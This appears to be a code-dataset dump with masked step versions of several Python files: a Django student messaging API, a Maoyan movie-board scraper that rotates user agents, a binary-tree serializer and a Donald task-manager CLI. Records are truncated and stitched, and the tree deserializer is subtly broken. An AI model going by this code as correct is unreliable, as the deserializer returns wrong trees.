JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n username = payload['username']\n # print(user_id,username)\n receiver = request.data.get('receiver')\n message = request.data.get('message')\n identity = request.data.get('identity')\n\n if identity == 0:\n privateLetter = PrivateLetter(senderStu_id=user_id,receiverTea_id=receiver,message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=receiver)&Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,receiverStu_id=user_id)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver).first().id\n privateLetter = PrivateLetter(senderStu_id=user_id,receiverStu_id=receiverStu_id,message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=receiverStu_id)&Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=receiverStu_id,receiverStu_id=user_id)\n privateLetter.save()\n chatBoxIsOpen.save()\n\n return Response({\n 'status': 200,\n 'msg': '发布私信成功',\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 获取最近联系人\nclass stuRecentContactsView(APIView):\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n \n data_list = []\n for item in PrivateLetter.objects.filter(senderStu_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != \"\":\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id).first().stu_num\n data = {\n 'receiver': receiver,\n 'identity': identity #老师:0;学生:1\n }\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverStu_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != \"\":\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id).first().stu_num\n data = {\n 'receiver': receiver,\n 'identity': identity #老师:0;学生:1\n }\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1,-1,-1):\n if (data_list[i]['receiver'] + str(data_list[i]['identity'])) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i]['identity'])] = '1'\n data_list1.append(data_list[i])\n\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n 'data': data_list1\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 关闭聊天框\nclass stuCloseChatBoxView(APIView):\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n \n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(receiverStu_id=Student.objects.filter(stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 打开聊天框\nclass stuOpenChatBoxView(APIView):\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n \n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 搜索联系人\nclass stuSearchContactView(APIView):\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n user_id = payload['id']\n username = payload['username']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n # print(receiver,identity=='0')\n\n # user = Teacher.objects.filter(id=username).first()\n # 0:教师,1:学生,2:还未搜索,3:自己,4:用户不存在\n iden = 4\n if identity == '1' and username == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {\n 'identity': iden,\n 'receiver': receiver\n }\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n 'data': data\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n",
"step-ids": [
14,
18,
21,
25,
26
]
}
|
[
14,
18,
21,
25,
26
] |
from urllib import request
import time
import random
from useragents import ua_list
import re
import os
class MaoyanSpider(object):
def __init__(self):
self.url = 'https://maoyan.com/board/4?offset={}'
# 请求功能函数 - html
def get_html(self,url):
headers = {
'User-Agent':random.choice(ua_list)
}
req = request.Request(url=url,headers=headers)
res = request.urlopen(req)
html = res.read().decode()
return html
# 解析功能函数
def re_func(self,re_bds,html):
pattern = re.compile(re_bds,re.S)
r_list = pattern.findall(html)
return r_list
# 解析一级页面
def parse_html(self,one_url):
one_html = self.get_html(one_url)
re_bds = '<div class="movie-item-info">.*?href="(.*?)".*?title="(.*?)".*?<p class="star">(.*?)</p>.*?class="releasetime">(.*?)</p>'
# r_list: [('/films/1203','name','star','time'),()]
r_list = self.re_func(re_bds,one_html)
self.save_html(r_list)
def save_html(self,r_list):
item = {}
# r: ('/films/1203','name','star','time')
for r in r_list:
item['name'] = r[1].strip()
item['star'] = r[2].strip()[3:]
item['time'] = r[3].strip()[5:15]
two_link = 'https://maoyan.com' + r[0]
item['comment'] = self.get_comment(two_link)
print(item)
self.save_image(two_link,item['name'])
# 获取评论的函数
def get_comment(self,two_link):
two_html = self.get_html(two_link)
with open('test.html','w') as f:
f.write(two_html)
re_bds = '<div class="comment-content">(.*?)</div>'
comment_list = self.re_func(re_bds,two_html)
return comment_list
# 保存图片函数
def save_image(self,two_link,name):
two_html = self.get_html(two_link)
re_bds = '<div class="img.*?"><img class="default-img" data-src="(.*?)" alt=""></div>'
# link_list: ['src1','src2','src3']
link_list = self.re_func(re_bds,two_html)
print(link_list)
# 创建对应文件夹
directory = '/home/tarena/images/' + name + '/'
if not os.path.exists(directory):
os.makedirs(directory)
for link in link_list:
headers = {'User-Agent':random.choice(ua_list)}
req = request.Request(url=link,headers=headers)
res = request.urlopen(req)
html = res.read()
filename = directory + \
link.split('@')[0][-10:]
with open(filename,'wb') as f:
f.write(html)
time.sleep(random.randint(1,3))
def run(self):
for offset in range(0,21,10):
url = self.url.format(offset)
self.parse_html(url)
time.sleep(random.randint(1,2))
if __name__ == '__main__':
spider = MaoyanSpider()
spider.run()
|
normal
|
{
"blob_id": "7ef0bb3e8cbba4a29249a09cf7bc91e053411361",
"index": 2225,
"step-1": "<mask token>\n\n\nclass MaoyanSpider(object):\n\n def __init__(self):\n self.url = 'https://maoyan.com/board/4?offset={}'\n\n def get_html(self, url):\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=url, headers=headers)\n res = request.urlopen(req)\n html = res.read().decode()\n return html\n <mask token>\n <mask token>\n <mask token>\n\n def get_comment(self, two_link):\n two_html = self.get_html(two_link)\n with open('test.html', 'w') as f:\n f.write(two_html)\n re_bds = '<div class=\"comment-content\">(.*?)</div>'\n comment_list = self.re_func(re_bds, two_html)\n return comment_list\n\n def save_image(self, two_link, name):\n two_html = self.get_html(two_link)\n re_bds = (\n '<div class=\"img.*?\"><img class=\"default-img\" data-src=\"(.*?)\" alt=\"\"></div>'\n )\n link_list = self.re_func(re_bds, two_html)\n print(link_list)\n directory = '/home/tarena/images/' + name + '/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n for link in link_list:\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=link, headers=headers)\n res = request.urlopen(req)\n html = res.read()\n filename = directory + link.split('@')[0][-10:]\n with open(filename, 'wb') as f:\n f.write(html)\n time.sleep(random.randint(1, 3))\n\n def run(self):\n for offset in range(0, 21, 10):\n url = self.url.format(offset)\n self.parse_html(url)\n time.sleep(random.randint(1, 2))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MaoyanSpider(object):\n\n def __init__(self):\n self.url = 'https://maoyan.com/board/4?offset={}'\n\n def get_html(self, url):\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=url, headers=headers)\n res = request.urlopen(req)\n html = res.read().decode()\n return html\n\n def re_func(self, re_bds, html):\n pattern = re.compile(re_bds, re.S)\n r_list = pattern.findall(html)\n return r_list\n\n def parse_html(self, one_url):\n one_html = self.get_html(one_url)\n re_bds = (\n '<div class=\"movie-item-info\">.*?href=\"(.*?)\".*?title=\"(.*?)\".*?<p class=\"star\">(.*?)</p>.*?class=\"releasetime\">(.*?)</p>'\n )\n r_list = self.re_func(re_bds, one_html)\n self.save_html(r_list)\n\n def save_html(self, r_list):\n item = {}\n for r in r_list:\n item['name'] = r[1].strip()\n item['star'] = r[2].strip()[3:]\n item['time'] = r[3].strip()[5:15]\n two_link = 'https://maoyan.com' + r[0]\n item['comment'] = self.get_comment(two_link)\n print(item)\n self.save_image(two_link, item['name'])\n\n def get_comment(self, two_link):\n two_html = self.get_html(two_link)\n with open('test.html', 'w') as f:\n f.write(two_html)\n re_bds = '<div class=\"comment-content\">(.*?)</div>'\n comment_list = self.re_func(re_bds, two_html)\n return comment_list\n\n def save_image(self, two_link, name):\n two_html = self.get_html(two_link)\n re_bds = (\n '<div class=\"img.*?\"><img class=\"default-img\" data-src=\"(.*?)\" alt=\"\"></div>'\n )\n link_list = self.re_func(re_bds, two_html)\n print(link_list)\n directory = '/home/tarena/images/' + name + '/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n for link in link_list:\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=link, headers=headers)\n res = request.urlopen(req)\n html = res.read()\n filename = directory + link.split('@')[0][-10:]\n with open(filename, 'wb') as f:\n f.write(html)\n time.sleep(random.randint(1, 3))\n\n def run(self):\n for offset in range(0, 21, 10):\n url = self.url.format(offset)\n self.parse_html(url)\n time.sleep(random.randint(1, 2))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass MaoyanSpider(object):\n\n def __init__(self):\n self.url = 'https://maoyan.com/board/4?offset={}'\n\n def get_html(self, url):\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=url, headers=headers)\n res = request.urlopen(req)\n html = res.read().decode()\n return html\n\n def re_func(self, re_bds, html):\n pattern = re.compile(re_bds, re.S)\n r_list = pattern.findall(html)\n return r_list\n\n def parse_html(self, one_url):\n one_html = self.get_html(one_url)\n re_bds = (\n '<div class=\"movie-item-info\">.*?href=\"(.*?)\".*?title=\"(.*?)\".*?<p class=\"star\">(.*?)</p>.*?class=\"releasetime\">(.*?)</p>'\n )\n r_list = self.re_func(re_bds, one_html)\n self.save_html(r_list)\n\n def save_html(self, r_list):\n item = {}\n for r in r_list:\n item['name'] = r[1].strip()\n item['star'] = r[2].strip()[3:]\n item['time'] = r[3].strip()[5:15]\n two_link = 'https://maoyan.com' + r[0]\n item['comment'] = self.get_comment(two_link)\n print(item)\n self.save_image(two_link, item['name'])\n\n def get_comment(self, two_link):\n two_html = self.get_html(two_link)\n with open('test.html', 'w') as f:\n f.write(two_html)\n re_bds = '<div class=\"comment-content\">(.*?)</div>'\n comment_list = self.re_func(re_bds, two_html)\n return comment_list\n\n def save_image(self, two_link, name):\n two_html = self.get_html(two_link)\n re_bds = (\n '<div class=\"img.*?\"><img class=\"default-img\" data-src=\"(.*?)\" alt=\"\"></div>'\n )\n link_list = self.re_func(re_bds, two_html)\n print(link_list)\n directory = '/home/tarena/images/' + name + '/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n for link in link_list:\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=link, headers=headers)\n res = request.urlopen(req)\n html = res.read()\n filename = directory + link.split('@')[0][-10:]\n with open(filename, 'wb') as f:\n f.write(html)\n time.sleep(random.randint(1, 3))\n\n def run(self):\n for offset in range(0, 21, 10):\n url = self.url.format(offset)\n self.parse_html(url)\n time.sleep(random.randint(1, 2))\n\n\nif __name__ == '__main__':\n spider = MaoyanSpider()\n spider.run()\n",
"step-4": "from urllib import request\nimport time\nimport random\nfrom useragents import ua_list\nimport re\nimport os\n\n\nclass MaoyanSpider(object):\n\n def __init__(self):\n self.url = 'https://maoyan.com/board/4?offset={}'\n\n def get_html(self, url):\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=url, headers=headers)\n res = request.urlopen(req)\n html = res.read().decode()\n return html\n\n def re_func(self, re_bds, html):\n pattern = re.compile(re_bds, re.S)\n r_list = pattern.findall(html)\n return r_list\n\n def parse_html(self, one_url):\n one_html = self.get_html(one_url)\n re_bds = (\n '<div class=\"movie-item-info\">.*?href=\"(.*?)\".*?title=\"(.*?)\".*?<p class=\"star\">(.*?)</p>.*?class=\"releasetime\">(.*?)</p>'\n )\n r_list = self.re_func(re_bds, one_html)\n self.save_html(r_list)\n\n def save_html(self, r_list):\n item = {}\n for r in r_list:\n item['name'] = r[1].strip()\n item['star'] = r[2].strip()[3:]\n item['time'] = r[3].strip()[5:15]\n two_link = 'https://maoyan.com' + r[0]\n item['comment'] = self.get_comment(two_link)\n print(item)\n self.save_image(two_link, item['name'])\n\n def get_comment(self, two_link):\n two_html = self.get_html(two_link)\n with open('test.html', 'w') as f:\n f.write(two_html)\n re_bds = '<div class=\"comment-content\">(.*?)</div>'\n comment_list = self.re_func(re_bds, two_html)\n return comment_list\n\n def save_image(self, two_link, name):\n two_html = self.get_html(two_link)\n re_bds = (\n '<div class=\"img.*?\"><img class=\"default-img\" data-src=\"(.*?)\" alt=\"\"></div>'\n )\n link_list = self.re_func(re_bds, two_html)\n print(link_list)\n directory = '/home/tarena/images/' + name + '/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n for link in link_list:\n headers = {'User-Agent': random.choice(ua_list)}\n req = request.Request(url=link, headers=headers)\n res = request.urlopen(req)\n html = res.read()\n filename = directory + link.split('@')[0][-10:]\n with open(filename, 'wb') as f:\n f.write(html)\n time.sleep(random.randint(1, 3))\n\n def run(self):\n for offset in range(0, 21, 10):\n url = self.url.format(offset)\n self.parse_html(url)\n time.sleep(random.randint(1, 2))\n\n\nif __name__ == '__main__':\n spider = MaoyanSpider()\n spider.run()\n",
"step-5": "from urllib import request\nimport time\nimport random\nfrom useragents import ua_list\nimport re\nimport os\n\nclass MaoyanSpider(object):\n def __init__(self):\n self.url = 'https://maoyan.com/board/4?offset={}'\n\n # 请求功能函数 - html\n def get_html(self,url):\n headers = {\n 'User-Agent':random.choice(ua_list)\n }\n req = request.Request(url=url,headers=headers)\n res = request.urlopen(req)\n html = res.read().decode()\n\n return html\n\n # 解析功能函数\n def re_func(self,re_bds,html):\n pattern = re.compile(re_bds,re.S)\n r_list = pattern.findall(html)\n\n return r_list\n\n # 解析一级页面\n def parse_html(self,one_url):\n one_html = self.get_html(one_url)\n re_bds = '<div class=\"movie-item-info\">.*?href=\"(.*?)\".*?title=\"(.*?)\".*?<p class=\"star\">(.*?)</p>.*?class=\"releasetime\">(.*?)</p>'\n # r_list: [('/films/1203','name','star','time'),()]\n r_list = self.re_func(re_bds,one_html)\n self.save_html(r_list)\n\n def save_html(self,r_list):\n item = {}\n # r: ('/films/1203','name','star','time')\n for r in r_list:\n item['name'] = r[1].strip()\n item['star'] = r[2].strip()[3:]\n item['time'] = r[3].strip()[5:15]\n two_link = 'https://maoyan.com' + r[0]\n item['comment'] = self.get_comment(two_link)\n print(item)\n self.save_image(two_link,item['name'])\n\n # 获取评论的函数\n def get_comment(self,two_link):\n two_html = self.get_html(two_link)\n\n with open('test.html','w') as f:\n f.write(two_html)\n\n re_bds = '<div class=\"comment-content\">(.*?)</div>'\n comment_list = self.re_func(re_bds,two_html)\n\n return comment_list\n\n\n # 保存图片函数\n def save_image(self,two_link,name):\n two_html = self.get_html(two_link)\n\n re_bds = '<div class=\"img.*?\"><img class=\"default-img\" data-src=\"(.*?)\" alt=\"\"></div>'\n # link_list: ['src1','src2','src3']\n link_list = self.re_func(re_bds,two_html)\n\n print(link_list)\n\n # 创建对应文件夹\n directory = '/home/tarena/images/' + name + '/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n for link in link_list:\n headers = {'User-Agent':random.choice(ua_list)}\n req = request.Request(url=link,headers=headers)\n res = request.urlopen(req)\n html = res.read()\n\n filename = directory + \\\n link.split('@')[0][-10:]\n with open(filename,'wb') as f:\n f.write(html)\n time.sleep(random.randint(1,3))\n\n def run(self):\n for offset in range(0,21,10):\n url = self.url.format(offset)\n self.parse_html(url)\n time.sleep(random.randint(1,2))\n\nif __name__ == '__main__':\n spider = MaoyanSpider()\n spider.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-ids": [
6,
9,
10,
11,
12
]
}
|
[
6,
9,
10,
11,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Codec:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Codec:
<|reserved_special_token_0|>
def deserialize(self, data):
"""Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
self.data = data
if data[0] == 'X':
return None
else:
t = TreeNode(int(self.data[:self.data.find(',')]))
t.left = self.deserialize(self.data[self.data.find(',') + 1:])
t.right = self.deserialize(self.data[self.data.find(',') + 1:])
return t
<|reserved_special_token_1|>
class Codec:
def serialize(self, root):
"""Encodes a tree to a single string.
:type root: TreeNode
:rtype: str
"""
if not root:
return 'X'
else:
return ','.join([str(root.val), self.serialize(root.left), self
.serialize(root.right)])
def deserialize(self, data):
"""Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
self.data = data
if data[0] == 'X':
return None
else:
t = TreeNode(int(self.data[:self.data.find(',')]))
t.left = self.deserialize(self.data[self.data.find(',') + 1:])
t.right = self.deserialize(self.data[self.data.find(',') + 1:])
return t
<|reserved_special_token_1|>
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Codec:
def serialize(self, root):
"""Encodes a tree to a single string.
:type root: TreeNode
:rtype: str
"""
if(not root) :
return "X"
else :
return ",".join([str(root.val), self.serialize(root.left), self.serialize(root.right)])
# Q = [root]
# res = []
# while(Q) :
# newQ = []
# noChange = True
# while(Q) :
# v = Q.pop(0)
# if(v == None) :
# res.append(' ')
# newQ.append(None)
# newQ.append(None)
# else :
# res.append(str(v.val))
# if(v.left == None) :
# newQ.append(None)
# else :
# noChange = False
# newQ.append(v.left)
# if(v.right == None) :
# newQ.append(None)
# else :
# noChange = False
# newQ.append(v.right)
# if(noChange) :
# break
# Q = newQ
# return ','.join(res)
def deserialize(self, data):
"""Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
self.data = data
if(data[0] == "X") :
return None
else :
t = TreeNode(int(self.data[: self.data.find(",")]))
t.left = self.deserialize(self.data[self.data.find(",") + 1 :])
t.right = self.deserialize(self.data[self.data.find(",") + 1 :])
return t
# arr = data.split(",")
# l = len(arr)
# if(l == 0 or arr[0] == " ") :
# return None
# t = TreeNode(int(arr[0]))
# Q = [t]
# half = (l + 1) / 2 - 1
# i = 0
# while(i < half) :
# v = Q.pop(0)
# if(v == None) :
# i += 1
# Q.append(None)
# Q.append(None)
# continue
# if(arr[2 * i + 1] == ' ') :
# v.left = None
# Q.append(None)
# else :
# l = TreeNode(int(arr[2 * i + 1]))
# v.left = l
# Q.append(l)
# if(arr[2 * i + 2] == ' ') :
# v.right = None
# Q.append(None)
# else :
# r = TreeNode(int(arr[2 * i + 2]))
# v.right = r
# Q.append(r)
# i += 1
# return t
# Your Codec object will be instantiated and called as such:
# ser = Codec()
# deser = Codec()
# ans = deser.deserialize(ser.serialize(root))
|
flexible
|
{
"blob_id": "006e1088e72201fab7eebd1409c025b5dba69403",
"index": 5938,
"step-1": "<mask token>\n",
"step-2": "class Codec:\n <mask token>\n <mask token>\n",
"step-3": "class Codec:\n <mask token>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n \n :type data: str\n :rtype: TreeNode\n \"\"\"\n self.data = data\n if data[0] == 'X':\n return None\n else:\n t = TreeNode(int(self.data[:self.data.find(',')]))\n t.left = self.deserialize(self.data[self.data.find(',') + 1:])\n t.right = self.deserialize(self.data[self.data.find(',') + 1:])\n return t\n",
"step-4": "class Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string.\n \n :type root: TreeNode\n :rtype: str\n \"\"\"\n if not root:\n return 'X'\n else:\n return ','.join([str(root.val), self.serialize(root.left), self\n .serialize(root.right)])\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n \n :type data: str\n :rtype: TreeNode\n \"\"\"\n self.data = data\n if data[0] == 'X':\n return None\n else:\n t = TreeNode(int(self.data[:self.data.find(',')]))\n t.left = self.deserialize(self.data[self.data.find(',') + 1:])\n t.right = self.deserialize(self.data[self.data.find(',') + 1:])\n return t\n",
"step-5": "# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string.\n \n :type root: TreeNode\n :rtype: str\n \"\"\"\n if(not root) :\n return \"X\"\n else :\n return \",\".join([str(root.val), self.serialize(root.left), self.serialize(root.right)])\n \n \n# Q = [root]\n# res = []\n# while(Q) :\n# newQ = []\n# noChange = True\n# while(Q) :\n# v = Q.pop(0)\n# if(v == None) :\n# res.append(' ')\n# newQ.append(None)\n# newQ.append(None)\n# else :\n# res.append(str(v.val))\n \n# if(v.left == None) :\n# newQ.append(None)\n# else :\n# noChange = False\n# newQ.append(v.left) \n \n# if(v.right == None) :\n# newQ.append(None)\n# else :\n# noChange = False\n# newQ.append(v.right)\n\n \n# if(noChange) :\n# break\n# Q = newQ\n# return ','.join(res)\n \n \n \n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n \n :type data: str\n :rtype: TreeNode\n \"\"\"\n self.data = data\n \n if(data[0] == \"X\") :\n return None\n else :\n t = TreeNode(int(self.data[: self.data.find(\",\")]))\n t.left = self.deserialize(self.data[self.data.find(\",\") + 1 :])\n t.right = self.deserialize(self.data[self.data.find(\",\") + 1 :])\n return t\n \n \n \n# arr = data.split(\",\")\n \n# l = len(arr)\n \n# if(l == 0 or arr[0] == \" \") :\n# return None\n \n# t = TreeNode(int(arr[0]))\n \n# Q = [t]\n \n# half = (l + 1) / 2 - 1\n \n# i = 0\n \n \n# while(i < half) :\n# v = Q.pop(0)\n# if(v == None) :\n# i += 1\n# Q.append(None)\n# Q.append(None)\n# continue\n \n# if(arr[2 * i + 1] == ' ') :\n# v.left = None\n# Q.append(None)\n# else :\n# l = TreeNode(int(arr[2 * i + 1]))\n# v.left = l\n# Q.append(l)\n# if(arr[2 * i + 2] == ' ') :\n# v.right = None\n# Q.append(None)\n# else :\n# r = TreeNode(int(arr[2 * i + 2]))\n# v.right = r\n# Q.append(r)\n# i += 1\n# return t\n \n \n\n# Your Codec object will be instantiated and called as such:\n# ser = Codec()\n# deser = Codec()\n# ans = deser.deserialize(ser.serialize(root))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:
@wraps(fn)
@click.pass_context
def wrapper(ctx, *args, **kwargs):
loop = ctx.obj['loop']
return loop.run_until_complete(fn(ctx, *args, **kwargs))
return wrapper
@click.group()
@click.option('-M', '--manager', 'manager', required=True, help=
'Python path to the manager')
@click.pass_context
def cli(ctx: click.Context, manager: str):
ctx.obj['manager'] = import_manager(manager)
<|reserved_special_token_0|>
def main():
loop = asyncio.get_event_loop()
cli(obj={'loop': loop})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def import_manager(path: str) ->Donald:
"""Import a manager from a python path."""
manager: Donald = import_obj(path)
return manager
def process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:
@wraps(fn)
@click.pass_context
def wrapper(ctx, *args, **kwargs):
loop = ctx.obj['loop']
return loop.run_until_complete(fn(ctx, *args, **kwargs))
return wrapper
@click.group()
@click.option('-M', '--manager', 'manager', required=True, help=
'Python path to the manager')
@click.pass_context
def cli(ctx: click.Context, manager: str):
ctx.obj['manager'] = import_manager(manager)
<|reserved_special_token_0|>
def main():
loop = asyncio.get_event_loop()
cli(obj={'loop': loop})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if TYPE_CHECKING:
from donald.manager import Donald
from .types import TV
def import_manager(path: str) ->Donald:
"""Import a manager from a python path."""
manager: Donald = import_obj(path)
return manager
def process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:
@wraps(fn)
@click.pass_context
def wrapper(ctx, *args, **kwargs):
loop = ctx.obj['loop']
return loop.run_until_complete(fn(ctx, *args, **kwargs))
return wrapper
@click.group()
@click.option('-M', '--manager', 'manager', required=True, help=
'Python path to the manager')
@click.pass_context
def cli(ctx: click.Context, manager: str):
ctx.obj['manager'] = import_manager(manager)
@cli.command(help='Launch a worker')
@click.option('-S', '--scheduler', 'scheduler', is_flag=True, help=
'Start a scheduler')
@process_await
async def worker(ctx: click.Context, *, scheduler: bool=False, **params):
"""Launch a worker."""
loop = ctx.obj['loop']
async def stop():
loop.remove_signal_handler(signal.SIGTERM)
loop.remove_signal_handler(signal.SIGINT)
await worker.stop()
if scheduler:
await manager.scheduler.stop()
await manager.stop()
loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))
loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))
manager: Donald = ctx.obj['manager']
await manager.start()
if scheduler:
manager.scheduler.start()
worker = manager.create_worker(show_banner=True, **params)
worker.start()
await worker.wait()
@cli.command(help='Launch a scheduler')
@process_await
async def scheduler(ctx: click.Context):
loop = ctx.obj['loop']
async def stop():
loop.remove_signal_handler(signal.SIGTERM)
loop.remove_signal_handler(signal.SIGINT)
await manager.scheduler.stop()
await manager.stop()
loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))
loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))
manager: Donald = ctx.obj['manager']
await manager.start()
manager.scheduler.start()
await manager.scheduler.wait()
def main():
loop = asyncio.get_event_loop()
cli(obj={'loop': loop})
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
from __future__ import annotations
import asyncio
import signal
from functools import wraps
from typing import TYPE_CHECKING, Awaitable, Callable
import click
from .utils import import_obj
if TYPE_CHECKING:
from donald.manager import Donald
from .types import TV
def import_manager(path: str) ->Donald:
"""Import a manager from a python path."""
manager: Donald = import_obj(path)
return manager
def process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:
@wraps(fn)
@click.pass_context
def wrapper(ctx, *args, **kwargs):
loop = ctx.obj['loop']
return loop.run_until_complete(fn(ctx, *args, **kwargs))
return wrapper
@click.group()
@click.option('-M', '--manager', 'manager', required=True, help=
'Python path to the manager')
@click.pass_context
def cli(ctx: click.Context, manager: str):
ctx.obj['manager'] = import_manager(manager)
@cli.command(help='Launch a worker')
@click.option('-S', '--scheduler', 'scheduler', is_flag=True, help=
'Start a scheduler')
@process_await
async def worker(ctx: click.Context, *, scheduler: bool=False, **params):
"""Launch a worker."""
loop = ctx.obj['loop']
async def stop():
loop.remove_signal_handler(signal.SIGTERM)
loop.remove_signal_handler(signal.SIGINT)
await worker.stop()
if scheduler:
await manager.scheduler.stop()
await manager.stop()
loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))
loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))
manager: Donald = ctx.obj['manager']
await manager.start()
if scheduler:
manager.scheduler.start()
worker = manager.create_worker(show_banner=True, **params)
worker.start()
await worker.wait()
@cli.command(help='Launch a scheduler')
@process_await
async def scheduler(ctx: click.Context):
loop = ctx.obj['loop']
async def stop():
loop.remove_signal_handler(signal.SIGTERM)
loop.remove_signal_handler(signal.SIGINT)
await manager.scheduler.stop()
await manager.stop()
